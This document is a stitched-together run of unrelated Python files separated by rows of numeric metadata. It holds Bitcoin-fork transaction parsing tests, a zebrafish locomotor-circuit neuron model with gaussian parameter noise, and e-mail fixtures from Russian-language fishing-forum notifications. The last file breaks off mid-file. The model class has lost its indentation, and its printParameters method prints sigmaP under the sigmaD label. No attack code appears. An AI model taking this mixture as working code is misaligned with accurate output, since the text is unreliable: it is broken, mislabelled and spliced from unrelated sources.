        raw_tx = unhexlify('01000000000101712e5b4e97ab549d50ca60a4f5968b2225215e9fab82dae4720078711406972f0000000017160014848202fc47fb475289652fbd1912cc853ecb0096feffffff0232360000000000001976a914121ae7a2d55d2f0102ccc117cbcb70041b0e037f88ac10270000000000001976a914ec0be50951651261765cfa71d7bd41c7b9245bb388ac024830450221009263c7de80c297d5b21aba846cf6f0a970e1d339568167d1e4c1355c7711bc1602202c9312b8d32fd9c7acc54c46cab50eb7255ce3c012214c41fe1ad91bccb16a13012102ebdf6fc448431a2bd6380f912a0fa6ca291ca3340e79b6f0c1fdaff73cf54061075a0700')
        tx = Tx.parse(BytesIO(raw_tx))
        self.assertEqual(tx.serialize(), raw_tx)
        self.assertTrue(tx.verify())
        # Large 8-input transaction mixing segwit and legacy inputs.
        # NOTE: this literal was split across two physical lines in the
        # original file (an invalid line break inside the string); rejoined.
        raw_tx = unhexlify('020000000001081446a37707dc7ea5cf61806dd904f4ef4f0875a1ae0677cb2558af8154294db5070000001716001420b884a7838912a368ed6529f920edf39c0eabf6ffffffff3ec88712de2bc1812829a407e22c477e416df9437ef18e15c80cb6d415928f18000000001716001427dbca14f538846467a4b5ba0bc08014854db9c5ffffffff3176ffed5b1de43807d223216a82c6f68637ab7dbe2b585e184341f3a7d594cb0000000017160014d8f1c025669899719d87b3b21ca8e8fc2b139f15ffffffff54d8e606273ca57a3a559f3ce56619ad473701e19e5d2b4346d5082f47656fc3000000006b4830450221009447ef2f0ffb9e133f351161c2c3885f43c15d4b7682d7188011b07658537355022044c76b845efe00f1984d7c375a6af94280b4464917ea8274fa6eafa614647c83012102282deea2ecd8a0807ccfd51f9df5e1fd4bc9505b7e7e41ba922964ed59078c0cffffffff05392ab19a8d84d9db21d01d83bb2fc9c78a7b9555a7900a9b7b314a4f52d6990b00000017160014602845b585bdbb8a3e0cb6f7d2e54b50da1dc2caffffffff3ea224000c9023d3329f9fe10f0980deb05df5a089a77b8bda326476d0676b60000000006a4730440220499c7c60669b3b2f6e7a3535aa695d26c879cbf904c2a4d27abe8e9ce603b21b022022b126f3a3eb3800d56fc4b120e62b2bf8656160f42477709ab94c08488a57440121033fd51607ad8c7b20678ce90dc00e67305468dc5359f10d2b8e12bde1aad6b70affffffff2b380df0036fb56ce6abb604100c4475c44c5f78eb1ccb7eb3c8c68d4c07964401000000171600141222eb5661b5239b625a66596bf51c057dd6e36effffffff044f03ae06fe2cf464f0c06621f005f8584b17c83df3c274cc0532d92b0b4cbf030000001716001430128f1e88752aff630253a09502433615591817ffffffff0ae7546101000000001976a914fe129300f08787df2433ea1f179855ad631f521588ac7060b506000000001976a9141e52cea2417015d68a395961ded221e8773af94c88acfa331d000000000017a914718a41bebbfcfe7fc6f1713566e0e494062ccfe1877e905900000000001976a914d516332ccf4513a86e02103cb3723fcc4cc6d10488acf1523f000000000017a9149a1f25e8b22e06b94b36992690173927663e7a67873ca02f00000000001976a914781bc2683d9b8ca38a4805a2b3a3209c607f643988ac5b1fa5020000000017a914add3e0a14b450f7d68ec264d6c3eb3c4948ec611875e6f1800000000001976a91483449d8cfe9fdfbb16cb5632ca7b2ebb63ae90ab88aca342bc000000000017a914087d0060b24f68430474c5d048990158fd1ca7fb8700204e00000000001976a9147d79d91ffcc4d2ab74da606d22e60b794526244388ac0247304402200f6479c8a098d0d32e80023a6841273cb3bf2d9190c4ca9efed2d5a4b453d510022026c34fd235ba7a5e4f4dff2470b97b218672694738766fd3a6e562b1d73e9eff01210224af4a7a92c9967f3683fa3e0206daa5b928a84b35cae4de7427b0c0b1f7e0bf02473044022052c438047e0e7b44ff7c4e2072b79a69738420b9355d13a5c9d1094e3532968e02204eaaf65f26e11e346d23b39102194bed1ebc2c3e37521a9f00509616449fdb130121023638167aa99a910f4a4275b5bb628cc26facbfa5bf31f5cf2a6d554bc8db606002473044022014fa5476e6d80665113cc2b2555cc9ccb1c18333118a49a353dd1a932986ecab022035cdde8443957562510f0ee52e8ee400ca27f56785266ce4615ace4d1afb7c210121034ea7a539ad591d853b3ed679e5cf212801f063f0540ce1b9ee1085a2f6eac6aa0002483045022100ef9b368dd2498909df5cadde878c6ef708dfcbc3f0ca603c127bf531baff2be902201dd537223c6e67f5776b4ecf1a2baacfc0e198600431016a2f6e4928e2efc254012102e6b2a2dae2045633814c126ebeceebc036fc55a40f7aa56d03633b4f3cb407bf0002483045022100e426e718989f4141767bb5861d6d66c5b3d4b76bee849e8a05d0def1399b9a0c0220256b3c2e7e7e7e2cf7481e9e37feb6b1a877f13e396071f5c30af78557f89c0d012102d82c01881a7458f936b4c551e48adee3949585f842ece86a77e14c0976119ec602483045022100f4e5291e42dbe421eda30d670caf284b7d675ed439df64371d14d9dac028646502202e04dcea07a7d8bfc59f95172c87cdf9f2fa4f97559971cd08e2efd50cf3acb4012103a5c6e168f4acf6470b018fb9b86ef9ae58ba1834c3646a2ed1bebbfb94acf83500000000')
        tx = Tx.parse(BytesIO(raw_tx))
        self.assertEqual(tx.serialize(), raw_tx)
        self.assertTrue(tx.verify())

    def test_bch(self):
        raw = unhexlify('01000000021128db2baee531447170d0916a553b07e8912a1c47e4e174afc7bfdf4afd3185010000008a4730440220211497a5609bcdeba19552e54a96b63f153656ecc5ba997ca8174a8102b4d8c602206a079685c36b46902ba366e112ba17b44e79dc8cb9b3b4792848c4f2f97192ae41410456e1306c1068ff31f1e8dbdd0b976092b1b4903b1a8ee3fe878508fa7f584d399b3a0a48c4215cded444257ce358b04720c62c73d5a8c0bb4ad261096baaaec4ffffffffedc5aa7918bd8beb801277177b3b7d15924682358e6342570be84f91e6d11835010000008a47304402203b0ee7aedaa5237325caee0433eeaba2ce2aff53d5c09c91bc2a79c51500f0b702201ecfd381d027a0d08b2409691bc73c16e626cbcd3c80a9980fa1e41b7a11cb5041410456e1306c1068ff31f1e8dbdd0b976092b1b4903b1a8ee3fe878508fa7f584d399b3a0a48c4215cded444257ce358b04720c62c73d5a8c0bb4ad261096baaaec4ffffffff01ac3ae60e000000001976a91441e904a482e61766cec490a8a5f3fbcf6bffdb2a88ac00000000')
        tx = BCHTx.parse(BytesIO(raw))
        self.assertTrue(tx.verify())
        # 6-input BCH transaction; seed each input's cached value and script
        # from the known funding addresses/amounts.
        raw_tx = unhexlify('01000000066f267f335a54abf404c66a7a6e9ed3d77566a09ce11632f57029a677f42c6095000000006b483045022100fb0b16699c9b0984345c7860e208c04694aaa5117c8306082cfafc58b53e489a02203cd53408f1f8c8ff29701a9d1f6960b2dc5e1039f0eea949c5a886ac367e1e38412102fdcae0e5a55b20c8d3cbdf451d39f6d47daa50f884ed0ffcf0ae0adfeec4abb9ffffffff4ceb6a2894b19b96fedd543750bf7307805a2f6ca189c8c42d1abbe2930235fa000000006a4730440220794c269d519b567aa694de6dcde1d09dffa30b69dc18a619ce9ea65f239899150220156394f70f405c0710851490b9f21dc8a23931fbdc8a70ea51f73e9b00274a5c412103b708cd0b3329cff03611b0155384d1d4f40cb3aa30f82d8f4a34da044c868058ffffffff15053ac5123a25e0adf0ed998dfb710fff827861ac1a4c6601be8034179350ab000000006a473044022020e7b448318fa44b977d557b639aaf3a9666cf6d8dd446bd7812e752ddfcd1d302207159d22c2e379b77b0514b8e0767d0e9fff7063a659c268d605be436f65703884121031a97eb1664ceffa32988f7ea7c6726d681f1385b9765be1a40d6083fba4e6c69ffffffff2e1fb2ad94461104b147ffe95d0534eb98495c45831547b70eae652ac6cf52d0000000006b483045022100b0ce5496d51673f82430eee24c57f7f2f2631e5b9b32c78bbd79e1cbf3f6297b02201c807ecfa86c1c493e83f1235a19e4426da651e8f76c2f4b41ceebf1222a9291412102e4aa3631fd0b4a877c7c0a040b8211636f743c392ce17e6f266beb1b62490af9ffffffff311368bcf1bac2ae2e906bd7e84e9b45da861a63154ae5c3d69840f65486ba86000000006b483045022100d5f63c5284604eefb942fa9710f8d5b5bccf431e63c496237a0c41eb5c6debf102202bda17f3b7406b9c41f44c7377261413cfa144489a70a40e9e9126b3e7f2fc734121032e413587a71814365b7912eac3a052d8ac0c5f2351d3d84863a02bafefd41f19ffffffff2e9e219c5a68079891a8d2b00bfcf3772fa605997773c2c516bb5ac99aa8ee06000000006a47304402207b6e0d96d0ce538fb54fcb1731a35632b6e40efde834ce45ee22f0c0f5baa886022009327de37e3fb657af29161d265db558869c09e295e84ddb2f686a492db0015a41210389c44f336f7c8cc3096f8f40bc5bdbffea24da9e26649dbe6b862d7d369698d0ffffffff0102b84f05000000001976a9145c52250125494685f133df34f47fb88799b2903588ac00000000')
        tx = BCHTx.parse(BytesIO(raw_tx))
        inputs = (
            ('18Lk6CB2WSpc4BVbxWhZrxLaYaJA2XVtyU', 24285000),
            ('13xY6E2tnBC5eGFCkayAUdVVcuGkFPoebJ', 824730),
            ('1BjFmsA4StiDa9xjAwahFXNpzR6SfXxBFD', 7583000),
            ('1Nn5QirD9iFT5kSF35XN8E3SX3SJM1daPL', 13150000),
            ('1HE8AdXHkP2bbnKmgENET4iyCHncP7rd7G', 32850000),
            ('1J3BgNjoqeR5JhHzC2rgorzBXTmdbmYcau', 10422900),
        )
        # (The original loop also did a no-op `i += 1` on the enumerate
        # variable; zip over the inputs directly instead.)
        for tx_in, (addr, value) in zip(tx.tx_ins, inputs):
            h160 = Tx.get_address_data(addr)['h160']
            tx_in._value = value
            tx_in._script_pubkey = Script.parse(p2pkh_script(h160))
        self.assertTrue(tx.verify())

    def test_btg(self):
        raw = unhexlify('0200000002618c8a9c486a961e57e99c8a249cd43937f4447083a3c9589cc30eebb38e0d8d010000006a473044022075173f771f997652e94c461a22147c1154336fb498cfb2cc4a5af5d0b94f43960220322a22f4290a580e3f0953cff7ba548c63d0829936413fc805a802bb005881014121034a66bef852adc6fa774d95a7ebef5a2b18e3b61d05e23130b9a4ad6fffa536bdfeffffff8afa4e2c895facf0354e66910cf6ed02e8549eaad8926688dedb754781e118b2010000006a473044022025575c1912ae89a29a639fca6ac3d72423214dbff62afd7a48a358464585da0d022068706419a61e60a571c084797177856f514a9ecd8d8df2f2e113c5daa4e560f041210259316ac5f9f5fecb6597929de0cb05739432b067b79444a57adbf9e413fc61defeffffff021f7a1b1d000000001976a914dd23a9af489c2b1e08a13122aac1a06752df8ed188ac7af11400000000001976a914bd31883c773888a0f99e16deeff118ff0ec15d0888ac7dbf0700')
        tx = BTGTx.parse(BytesIO(raw))
        tx.tx_ins[0]._value = 488779958
        h160 = BTGTx.get_address_data('GWmfLaQ7ZKmUX7rmW63u63b9ghbuwr9yN1')['h160']
        tx.tx_ins[0]._script_pubkey = Script.parse(p2pkh_script(h160))
        tx.tx_ins[1]._value = 969979
        h160 = BTGTx.get_address_data('GgvZtZ8aV1UhTgLzzRbXVLrwwVoJL9WywW')['h160']
        tx.tx_ins[1]._script_pubkey = Script.parse(p2pkh_script(h160))
        self.assertTrue(tx.verify())

    def test_bcd(self):
        raw = unhexlify('0c00000025b6923ff3cb4264408ed5d5cca3cc41c7586820c95aeec24503d5a11418dd2501d0b96dd7ff4e3de5113ca48cefcbb4083541154c75e51a2e7b09879301a71cc5000000006a47304402201e10a7a5d03235236475feede87c57a38a79ab3399aafe90fcb9c47de525603b0220547fd8897c0e9d318dbe6c350c784eeb31b3cb18fbf550516fcc0168c22810e5012103e97b79d9aa924bfcea2915235ebc5b4cc7db5414e63ccb61ed2d197e29cb9fdbffffffff0280cb7831000000001976a91449664b451210fc8b3c055ce5606f0d8199ceae6788ac5a434600000000001976a9148868e1942ff8445f2e3791d9fa1dc881b8aec08c88ac00000000')
        tx = BCDTx.parse(BytesIO(raw))
        tx.tx_ins[0]._value = 834614762
        h160 = BCDTx.get_address_data('1MtE3mjo4AByFJSB8bAuVUHeqb21brLKJ5')['h160']
        tx.tx_ins[0]._script_pubkey = Script.parse(p2pkh_script(h160))
        self.assertTrue(tx.verify())

    def test_sbtc(self):
        raw = unhexlify('0100000002a81e0df5218289cc4ee761a1747b494990cc1f5b2dc84f0542ad6f28f69d5f4c040000006b483045022100aaf4a05870a9a8ca79a612600936d27bbfce97ebf4e2fe4d311e40c4b78ca6550220175ecff50679023ffce58019ee711784229b8c738b85093d34b4ccc72592087341210313910dbdf4ecfc35f6193b8f6484ab554587f6c7e5e376351e0978e7433d8c80ffffffff17a8282d91fccc03f7d422f5b124427c09c391aca3743cc1e04b7afbe8e282b9010000006b483045022100ef1c6716e19cf7de6eea6cb6468ce7efb2480d72795dc2066d7b1ea823830a6102204cbcdc56e420d9a88a650c126375815443636a0d628096b1439814445156bb0a41210313910dbdf4ecfc35f6193b8f6484ab554587f6c7e5e376351e0978e7433d8c80ffffffff01a05d5804000000001976a9144c3496d9f64847b45318baa5afd6b515c76013cf88ac00000000')
        tx = SBTCTx.parse(BytesIO(raw))
        tx.tx_ins[0]._value = 67700000
        h160 = SBTCTx.get_address_data('14fR5g6ypHFx3F9mJwiHaHXkMs5YjS4fJZ')['h160']
        tx.tx_ins[0]._script_pubkey = Script.parse(p2pkh_script(h160))
        tx.tx_ins[1]._value = 5300000
        # Bug fix: this line previously re-assigned tx_ins[0], leaving input 1
        # without a cached script_pubkey. Both inputs spend outputs paying the
        # same public key (identical SEC pubkey in both scriptSigs), so the
        # same P2PKH script applies to input 1.
        tx.tx_ins[1]._script_pubkey = Script.parse(p2pkh_script(h160))
        self.assertTrue(tx.verify())

    def test_b2x_sign(self):
        # Generated from ./bitcoin2x-qt -regtest
        wif = 'cVC6z7gnezHZut5yyuCX3x79tfcbauCWiFcBY92Vg4crfu4Maa5B'
        prev_tx = 'b6d073333c1a8e4360b1e2c7fa2ed6b67b74272ad7fabf52a4e4732df5f47dbd'
        prev_index = 0
        prev_value = 5000000000
        destination = 'mrVqpGm7F5MVCwsP4s3fQEN2GAaykJoTu4'
        amount = 4996000000
        priv_key = PrivateKey.parse(wif)
        prev_script_pubkey = B2XTx.get_address_data(priv_key.point.address())['script_pubkey'].serialize()
        tx_in = TxIn(unhexlify(prev_tx), prev_index, b'', 0xffffffff, b'\x00', prev_value, prev_script_pubkey)
        script = B2XTx.get_address_data(destination)['script_pubkey'].serialize()
        tx_out = TxOut(amount, script)
        tx = B2XTx(2, [tx_in], [tx_out], 0, testnet=True)
        tx.sign(priv_key)
        # Deterministic (RFC6979) signing makes the serialized result stable.
        want = "0200000001bd7df4f52d73e4a452bffad72a27747bb6d62efac7e2b160438e1a3c3373d0b6000000006a47304402201df7c8c97443bd46da751e0051a4395ba3613be3604be97d3c801c21e3d23c79022012ad30b7ffd42ad7bb96f9157519f7e3c35409ed54f783a3c854a596343a6c713121030f96812693c4a50162134cfa307afb63580171963d6c4198e8e5cfeee2c92b60ffffffff0100e9c829010000001976a91478738f2c5a75397eb2f851597261f766a67d9b6388ac00000000"
        self.assertTrue(tx.verify())
        self.assertEqual(tx.serialize().hex(), want)

    def test_fetch_address_utxos(self):
        # Live network lookup: just check the known address has a balance.
        addr = 'mgzCpjQxLVmw89FRrxrZqpzfE33HRAjaSU'
        utxos = Tx.fetch_address_utxos(addr)
        total = 0
        for _, prev_tx, prev_index, value in utxos:
            total += value
        self.assertTrue(total > 0)
| 96.153605
| 3,370
| 0.857334
| 1,363
| 30,673
| 19.082172
| 0.142333
| 0.009997
| 0.014764
| 0.01661
| 0.336345
| 0.322273
| 0.303433
| 0.294898
| 0.288631
| 0.287208
| 0
| 0.493355
| 0.099697
| 30,673
| 318
| 3,371
| 96.455975
| 0.448488
| 0.001239
| 0
| 0.327526
| 0
| 0
| 0.65955
| 0.657657
| 0
| 1
| 0.000979
| 0
| 0.167247
| 1
| 0.087108
| false
| 0
| 0.02439
| 0
| 0.114983
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d8c11439565c2bf602cfa6ed28961499a6f1eb8
| 5,381
|
py
|
Python
|
Zebrafish spinal locomotor circuit/Version 2/Double_coiling_with_sigmas.py
|
Bui-lab/Code
|
6ce5972a4bd0c059ab167522ab1d945f3b0f5707
|
[
"MIT"
] | null | null | null |
Zebrafish spinal locomotor circuit/Version 2/Double_coiling_with_sigmas.py
|
Bui-lab/Code
|
6ce5972a4bd0c059ab167522ab1d945f3b0f5707
|
[
"MIT"
] | null | null | null |
Zebrafish spinal locomotor circuit/Version 2/Double_coiling_with_sigmas.py
|
Bui-lab/Code
|
6ce5972a4bd0c059ab167522ab1d945f3b0f5707
|
[
"MIT"
] | 2
|
2021-08-25T08:14:52.000Z
|
2021-11-29T12:56:17.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 25 08:41:10 2017
@author: Yann Roussel and Tuan Bui
Edited by: Emine Topcu on Sep 2021
"""
from random import gauss
from Izhikevich_class import Izhikevich_9P, Leaky_Integrator
from Double_coiling_model import Double_coil_base
class Double_coil_with_sigmas(Double_coil_base):
sigmaD = 0
sigmaL = 0
sigmaP = 0
sigmaW = 0
def __init__(self, dt = 0.1, stim0 = 8, sigmaD = 0, sigmaL = 0, sigmaP = 0, sigmaW = 0,
             E_glu = 0, E_gly = -70,
             cv = 0.55, nIC = 5, nMN = 10, nV0d = 10, nV0v = 10, nV2a = 10, nMuscle = 10):
    """Double-coiling model variant with gaussian variability knobs.

    dt: integration time step; stim0: baseline stimulus amplitude.
    sigmaD/sigmaL/sigmaP/sigmaW: relative standard deviations for gaussian
    jitter. Only sigmaP's use is visible in this file (it scales every
    Izhikevich cell parameter in initNeurons via gauss(1, sigmaP));
    presumably sigmaD/sigmaL/sigmaW jitter weights/ranges elsewhere —
    confirm against Double_coil_base and the other init* overrides.
    E_glu/E_gly: glutamatergic/glycinergic reversal potentials (mV).
    cv: conduction-velocity parameter; nIC..nMuscle: population sizes.

    NOTE(review): only sigmaD is forwarded to the base constructor, in the
    third positional slot; verify Double_coil_base.__init__ expects it there.
    """
    super().__init__(dt, stim0, sigmaD, E_glu, E_gly,
                     cv, nIC, nMN, nV0d, nV0v, nV2a, nMuscle)
    # Keep all four sigmas on the instance for the overridden init* methods
    # (sigmaD is also stored by the base class call above, presumably).
    self.sigmaD = sigmaD
    self.sigmaL = sigmaL
    self.sigmaP = sigmaP
    self.sigmaW = sigmaW
def initNeurons(self):
## Declare Neuron Types
self.L_IC = [ Izhikevich_9P(a=0.0002*gauss(1, self.sigmaP),b=0.5*gauss(1, self.sigmaP),c=-40*gauss(1, self.sigmaP), d=5*gauss(1, self.sigmaP), vmax=0*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.3*gauss(1, self.sigmaP), Cm = 50*gauss(1, self.sigmaP), dt = self.dt, x=1.0,y=-1) for i in range(self.nIC)]
self.R_IC = [ Izhikevich_9P(a=0.0002*gauss(1, self.sigmaP),b=0.5*gauss(1, self.sigmaP),c=-40*gauss(1, self.sigmaP), d=5*gauss(1, self.sigmaP), vmax=0*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.3*gauss(1, self.sigmaP), Cm = 50*gauss(1, self.sigmaP), dt = self.dt, x=1.0,y=1) for i in range(self.nIC)]
self.L_MN = [ Izhikevich_9P(a=0.5*gauss(1, self.sigmaP),b=0.1*gauss(1, self.sigmaP),c=-50*gauss(1, self.sigmaP), d=100*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-50*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.0+1.6*i,y=-1) for i in range(self.nMN)]
self.R_MN = [ Izhikevich_9P(a=0.5*gauss(1, self.sigmaP),b=0.1*gauss(1, self.sigmaP),c=-50*gauss(1, self.sigmaP), d=100*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-50*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.0+1.6*i,y=1) for i in range(self.nMN)]
self.L_V0d = [ Izhikevich_9P(a=0.02*gauss(1, self.sigmaP),b=0.1*gauss(1, self.sigmaP),c=-30*gauss(1, self.sigmaP), d=3.75*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.0+1.6*i,y=-1) for i in range(self.nV0d)]
self.R_V0d = [ Izhikevich_9P(a=0.02*gauss(1, self.sigmaP),b=0.1*gauss(1, self.sigmaP),c=-30*gauss(1, self.sigmaP), d=3.75*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.0+1.6*i,y=1) for i in range(self.nV0d)]
self.L_V0v = [ Izhikevich_9P(a=0.02*gauss(1, self.sigmaP), b=0.1*gauss(1, self.sigmaP), c=-30*gauss(1, self.sigmaP), d=11.6*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.1+1.6*i,y=-1) for i in range(self.nV0v)]
self.R_V0v = [ Izhikevich_9P(a=0.02*gauss(1, self.sigmaP), b=0.1*gauss(1, self.sigmaP), c=-30*gauss(1, self.sigmaP), d=11.6*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.1+1.6*i,y=1) for i in range(self.nV0v)]
self.L_V2a = [ Izhikevich_9P(a=0.5*gauss(1, self.sigmaP), b=0.1*gauss(1, self.sigmaP), c=-50*gauss(1, self.sigmaP), d=100*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.1+1.6*i,y=-1) for i in range(self.nV2a)]
self.R_V2a = [ Izhikevich_9P(a=0.5*gauss(1, self.sigmaP), b=0.1*gauss(1, self.sigmaP), c=-50*gauss(1, self.sigmaP), d=100*gauss(1, self.sigmaP), vmax=10*gauss(1, self.sigmaP), vr=-60*gauss(1, self.sigmaP), vt=-45*gauss(1, self.sigmaP), k=0.05*gauss(1, self.sigmaP), Cm = 20*gauss(1, self.sigmaP), dt = self.dt, x=5.1+1.6*i,y=1) for i in range(self.nV2a)]
self.L_Muscle = [ Leaky_Integrator(50.0*gauss(1, self.sigmaP), 5.0*gauss(1, self.sigmaP), self.dt, 5.0+1.6*i,-1) for i in range(self.nMuscle)]
self.R_Muscle = [ Leaky_Integrator(50.0*gauss(1, self.sigmaP), 5.0*gauss(1, self.sigmaP), self.dt, 5.0+1.6*i, 1) for i in range(self.nMuscle)]
def rangeNoiseMultiplier(self):
return gauss(1, self.sigmaL)
def gapWeightNoiseMultiplier(self):
return gauss(1, self.sigmaW)
def synWeightNoiseMultiplier(self):
return gauss(1, self.sigmaW)
def getStimulus(self):
return self.stim0 * gauss(1, self.sigmaD)
def printParameters(self):
super().printParameters()
print("sigmaD: " + str(self.sigmaP) + "; sigmaL: " + str(self.sigmaL) + "; sigmaP: " + str(self.sigmaP) + "; sigmaW: " + str(self.sigmaW))
| 76.871429
| 365
| 0.64003
| 1,042
| 5,381
| 3.259117
| 0.113244
| 0.173145
| 0.288575
| 0.442874
| 0.776207
| 0.770318
| 0.770318
| 0.753239
| 0.736749
| 0.736749
| 0
| 0.097368
| 0.152574
| 5,381
| 69
| 366
| 77.985507
| 0.647368
| 0.031778
| 0
| 0.04878
| 0
| 0
| 0.007312
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.170732
| false
| 0
| 0.073171
| 0.097561
| 0.463415
| 0.073171
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5dc99f31e008fba7d441858e4cdd266aeb18043a
| 5,886
|
py
|
Python
|
obsolete/fixtures/rybaodessa_forum.py
|
telegrambotdev/telegram.email.notify
|
d16880819b2f1887b0e0f0b9841de2a122d81dd6
|
[
"MIT"
] | null | null | null |
obsolete/fixtures/rybaodessa_forum.py
|
telegrambotdev/telegram.email.notify
|
d16880819b2f1887b0e0f0b9841de2a122d81dd6
|
[
"MIT"
] | null | null | null |
obsolete/fixtures/rybaodessa_forum.py
|
telegrambotdev/telegram.email.notify
|
d16880819b2f1887b0e0f0b9841de2a122d81dd6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Test fixtures for parsing forum-notification e-mails.

Each ``sourceN`` holds the raw text of a notification e-mail and the matching
``resultN`` holds the text that is expected to be extracted from it.  The
``brokenN`` strings are malformed/truncated variants — presumably used to
exercise the parser's fallback paths (NOTE(review): confirm against the tests
that consume these fixtures).
"""
# Invision-board reply notification from "Одесский Клуб Рыболовов",
# topic "Тилигульский лиман".
source1 = """
Тилигульский лиман
Одесский Клуб Рыболовов Здравствуйте, VinsT!
мирон 2 опубликовал комментарий в тему, Тилигульский лиман
мирон 2 опубликовал(а): 14 часа назад, Ігор сказал:
Можно связывать канатом использованые шины и притапливать в лимане. Их быстро освоят мидии и другие жители лимана.
А с экологией как? Перейти к сообщению
Одесский Клуб Рыболовов Вы получили это письмо, потому что вы подписаны на Тема "Тилигульский лиман".
Отказаться от получения этих писем? Отписаться или Настройка уведомлений .
Одесский Клуб Рыболовов, одесса, одесса, одесса, 65000
"""
# Expected extraction for source1: board name, topic title and the quoted reply.
result1 = """Одесский Клуб Рыболовов:
Тилигульский лиман
мирон 2 опубликовал(а): 14 часа назад, Ігор сказал:
Можно связывать канатом использованые шины и притапливать в лимане. Их быстро освоят мидии и другие жители лимана.
А с экологией как?"""
# Same board, topic "Три карася"; the reply body contains a long URL with
# non-ASCII path segments.
source2 = """
Три карася
Одесский Клуб Рыболовов Здравствуйте, VinsT!
Anutka_Odessa_Mayaki опубликовал комментарий в тему, Три карася
Anutka_Odessa_Mayaki опубликовал(а): http://fishingclub.od.ua/forums/index.php?/topic/20432-открытый-турнир-по-карпфишингу-открытие-сезона-2018-на-рк-три-карася/ page=3
Приглашаем всех желающих принять участие в турнире "Один на один с трофеем"! Перейти к сообщению
Одесский Клуб Рыболовов Вы получили это письмо, потому что вы подписаны на Тема "Три карася".
Отказаться от получения этих писем? Отписаться или Настройка уведомлений .
Одесский Клуб Рыболовов, одесса, одесса, одесса, 65000
"""
# Expected extraction for source2.
result2 = """Одесский Клуб Рыболовов:
Три карася
Anutka_Odessa_Mayaki опубликовал(а): http://fishingclub.od.ua/forums/index.php?/topic/20432-открытый-турнир-по-карпфишингу-открытие-сезона-2018-на-рк-три-карася/ page=3
Приглашаем всех желающих принять участие в турнире "Один на один с трофеем"!"""
# vBulletin-style thread-subscription notification from "Одесский форум",
# complete with the tilde-delimited unsubscribe footer.
source3 = """
Ответ в теме 'Рыбалка на озерах и ставках'
Уважаемый(ая) VinsT,
dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
Эта тема расположена по адресу:
http://forumodua.com/showthread.php?t=1548612&goto=newpost
Размещенное сообщение:
***************
Вот нашел еще один интересный водоем на просторах и-нета Чистоводное в Белгород-Днестровском районе https://www.youtube.com/watch?v=7wJEKTmW1pE
Может кто был там, поделитесь инфой.
***************
Также могут быть и другие сообщения, но Вы не будете получать уведомления, пока снова не посетите форум.
С наилучшими пожеланиями,
Одесский форум
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Отказ от подписки:
Чтобы отказаться от получения рассылки по этой теме, пожалуйста, перейдите на страницу:
http://forumodua.com/subscription.php?do=removesubscription&type=thread&subscriptionid=13057535&auth=bc52182903810d701d0ff06c2a122e2d
Чтобы отказаться от получения рассылок по ВСЕМ темам, пожалуйста, перейдите на страницу:
http://forumodua.com/subscription.php?do=viewsubscription&folderid=all
"""
# Expected extraction for source3: everything between the greeting and the
# sign-off/footer.
result3 = """dimon777 только что ответил в теме, на которую Вы подписались, - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
Эта тема расположена по адресу:
http://forumodua.com/showthread.php?t=1548612&goto=newpost
Размещенное сообщение:
***************
Вот нашел еще один интересный водоем на просторах и-нета Чистоводное в Белгород-Днестровском районе https://www.youtube.com/watch?v=7wJEKTmW1pE
Может кто был там, поделитесь инфой.
***************
Также могут быть и другие сообщения, но Вы не будете получать уведомления, пока снова не посетите форум."""
# Malformed variant: the "ответил в теме, на которую Вы подписались" marker
# phrase is missing from the body.
broken1 = """
Ответ в теме 'Рыбалка на озерах и ставках'
Уважаемый(ая) VinsT,
dimon777 только что ответил - Рыбалка на озерах и ставках - в разделе Охота и рыбалка Одесский форум.
"""
# Malformed variant: header and body collapsed onto a single line.
